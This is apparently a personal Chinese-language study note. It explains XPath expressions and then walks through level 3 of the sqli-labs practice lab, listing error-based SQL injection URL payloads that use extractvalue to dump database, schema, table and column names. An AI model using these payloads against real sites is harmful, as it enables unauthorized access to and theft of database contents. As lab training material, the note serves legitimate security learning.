文章为自我记录,相关原理还是得自己查呀
前置知识xpath
XPath 使用路径表达式在 XML 文档中选取节点。节点是通过沿着路径或者 step 来选取的。
下面列出了最有用的路径表达式:
表达式 | 描述 |
---|---|
nodename | 选取此节点的所有子节点。 |
/ | 从根节点选取。 |
// | 从匹配选择的当前节点选择文档中的节点,而不考虑它们的位置。 |
. | 选取当前节点。 |
… | 选取当前节点的父节点。 |
@ | 选取属性。 |
实例
在下面的表格中,我们已列出了一些路径表达式以及表达式的结果:
路径表达式 | 结果 |
---|---|
bookstore | 选取 bookstore 元素的所有子节点。 |
/bookstore | 选取根元素 bookstore。注释:假如路径起始于正斜杠( / ),则此路径始终代表到某元素的绝对路径! |
bookstore/book | 选取属于 bookstore 的子元素的所有 book 元素。 |
//book | 选取所有 book 子元素,而不管它们在文档中的位置。 |
bookstore//book | 选择属于 bookstore 元素的后代的所有 book 元素,而不管它们位于 bookstore 之下的什么位置。 |
//@lang | 选取名为 lang 的所有属性。 |
xpath通配符
XPath 通配符可用来选取未知的 XML 元素。
通配符 | 描述 |
---|---|
* | 匹配任何元素节点。 |
@* | 匹配任何属性节点。 |
node() | 匹配任何类型的节点。 |
sqli-lab 3
具体流程还得见入门篇~~~
利用函数extractvalue,updatexml(替换查找xml文档)
1.找注入点
基本就是靠’ 来判断数字or字符, 1’ and 1=1 --+
1’ and 1=2 --+ 等语句找
2.进行注入
ps.为了防止打错,建议不要在地址栏中直接输入,而是利用hackbar
爆当前库名
?id=1') and extractvalue(1,concat(0x23,database()))--+
爆所有数据库名
?id=1') and extractvalue(1,concat(0x23,(select group_concat(schema_name) from information_schema.schemata)))--+
爆全部表名
?id=1%27)%20and%20extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema='security' )))--+
爆指定表的所有字段—好像爆错数据库了,不过没关系,都一样了
?id=1%27)%20and%20extractvalue(1,concat(0x23,(select group_concat(column_name) from information_schema.columns where table_name='users')))--+